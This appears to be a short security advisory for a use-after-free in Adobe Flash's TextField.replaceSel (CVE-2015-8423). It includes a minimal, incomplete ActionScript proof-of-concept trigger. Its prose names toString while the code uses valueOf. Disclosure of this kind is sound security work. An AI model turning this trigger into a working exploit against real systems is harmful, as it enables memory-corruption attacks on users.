Adobe Flash TextField.replaceSel - Use-After-Free

Related Vulnerabilities: CVE-2015-8423  
Publish Date: 18 Dec 2015

There is a use-after-free in TextField.replaceSel. If the string parameter of the method is set to an object with toString defined, this method can delete the TextField's parent, leading to a use-after-free.

A minimal PoC is as follows:

var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.replaceSel({valueOf : func});

function func(){


        // Fix heap here

	return "text";

A sample swf and fla are attached.

Proof of Concept: